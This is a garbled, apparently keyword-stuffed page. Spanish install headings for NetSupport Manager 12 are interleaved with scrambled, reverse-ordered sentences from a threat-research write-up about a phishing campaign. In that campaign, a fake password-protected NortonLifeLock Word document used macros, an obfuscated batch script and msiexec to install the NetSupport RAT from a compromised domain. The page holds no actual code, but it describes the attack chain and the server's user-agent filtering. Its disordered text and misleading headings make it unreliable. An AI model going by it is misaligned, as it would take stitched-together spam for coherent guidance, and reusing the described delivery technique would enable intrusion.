- #INSTALANDO NETSUPPORT MANAGER 12 INSTALL#
- #INSTALANDO NETSUPPORT MANAGER 12 CODE#
- #INSTALANDO NETSUPPORT MANAGER 12 WINDOWS#
This user-agent string is part of the msiexec command, further supporting that the payload will only be downloaded when using msiexec.
#INSTALANDO NETSUPPORT MANAGER 12 WINDOWS#
HTTP GET request to view.php on quickwaysignstxcomIf the user-agent string in the request is Windows Installer, an MSI file is returned. Note this domain appears to be a legitimate domain, which has been compromised and is being used by these operators.įigure 6. The server that is serving view.php appears to be filtering on the user-agent string, as visiting the site with a browser displays a standard image for the webpage.
#INSTALANDO NETSUPPORT MANAGER 12 INSTALL#
The batch script uses msiexec, which is a part of the Windows Installer service used to download and install a Microsoft Intermediate Language (MSIL) binary to the victim from the domain:
#INSTALANDO NETSUPPORT MANAGER 12 CODE#
Once the correct password is received, the macro continues code execution and builds the following command string: It should be noted that no malicious activity occurs until the correct key is entered. If the user enters an incorrect password, they are presented with an error message stating an incorrect key was entered followed by a “done” processing message. We suspect this password is provided in the phishing email, as it accepts only the letters ‘c’ or ‘C’ as shown in the macro code below. Password dialog box presented to the user Once the document is opened and the user clicks “Enable Content”, the macro is executed and the user is presented with a password dialog box. To the user, the document appears to contain personal information that requires a password to view. Delivery document disguised as NortonLifeLock. Cortex XDR™ causality chain timelineįigure 4 below is a screenshot of the malicious document used, disguised as a password-protected NortonLifelock document which requests the user to enter a password to enable macros. Figure 3 shows the initial alert detected based on these behavioral indicators. In Figure 2, you can see a rollup of the Timeline view showing an alert for a known bad indicator, the behavioral process execution, and attempted connection activities. In Figure 1, you can see multiple points of detection beginning with the initiating Microsoft Word process and continuing with the creation and execution of a. In early January 2020, the Cortex XDR™ Engine detected a suspicious winword.exe process executing an obfuscated batch file. In this write-up, we will describe the anomalous activities as observed through Cortex XDR’s behavioral detection capabilities. Through additional analysis, we identified related activity dating back to early November of 2019. This activity employs evasion techniques to evade both dynamic and static analysis and utilizes the PowerShell PowerSploit framework to carry out the installation of the malicious file activity. While we do not have the actual email, we are able to conclude that this activity appears to be a part of a larger campaign. The use of this NetSupport Manager RAT for unauthorized access has been observed in phishing campaigns since at least 2018.ĭuring an initial review of the detection, which was flagged via Cortex XDR™, we observed that the causality chain began when a Microsoft Word document was opened from within Microsoft Office Outlook. However, malicious operators are installing the RAT to victim’s systems allowing them to gain unauthorized access. This RAT is typically used for legitimate purposes allowing administrators remote access to client computers. Using a fictitious NortonLifelock document to entice the user to enable macros makes this particular attack interesting to us. In January 2020, the Cortex XDR Managed Threat Hunting team, part of Unit 42, identified a malicious Microsoft Word document, disguised as a password-protected NortonLifelock document, being used in a phishing campaign to deliver a commercially available remote access tool (RAT) called NetSupport Manager.